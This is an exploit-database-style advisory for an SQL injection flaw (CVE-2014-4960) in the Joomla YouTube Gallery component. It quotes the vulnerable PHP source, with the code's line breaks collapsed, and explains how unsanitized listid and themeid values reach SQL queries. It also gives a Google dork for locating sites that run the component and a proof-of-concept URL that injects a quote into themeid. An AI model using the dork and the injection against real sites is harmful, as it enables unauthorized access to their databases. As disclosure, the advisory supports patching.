# Exploit Title: Joomla component com_youtubegallery - SQL Injection
vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery# Date: 15-07-2014# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery# Software Link: http://www.joomlaboat.com/youtube-gallery# Version: 4.x ( 3.x maybe)# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3# CVE : CVE-2014-4960
Detail:
In line:40,file: components\com_youtubegallery\models\gallery.php,if parameter listid isint(or can cast to int), $listid and $themeid
will not santinized.
Source code:40:if(JRequest::getInt('listid'))41:{42://Shadow Box
43:$listid=JRequest::getVar('listid');44:45:46://Get Theme
47: $m_themeid=(int)JRequest::getVar('mobilethemeid');48:if($m_themeid!=0)49:{50:if(YouTubeGalleryMisc::check_user_agent('mobile'))51:$themeid=$m_themeid;52:else53:$themeid=JRequest::getVar('themeid');54:}55:else56: $themeid=JRequest::getVar('themeid');57:}
After, $themeid and $listid are used in line 86,92. Two method
getVideoListTableRow and getThemeTableRow concat string to construct
sql query. So it is vulnerable to SQL Injection.
Source code:86:if(!$this->misc->getVideoListTableRow($listid))87:{88: echo '<p>No video found</p>';89:return false;90:}91:92:if(!$this->misc->getThemeTableRow($themeid))93:{94:echo '<p>No video found</p>';95:return false;96:}# Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700
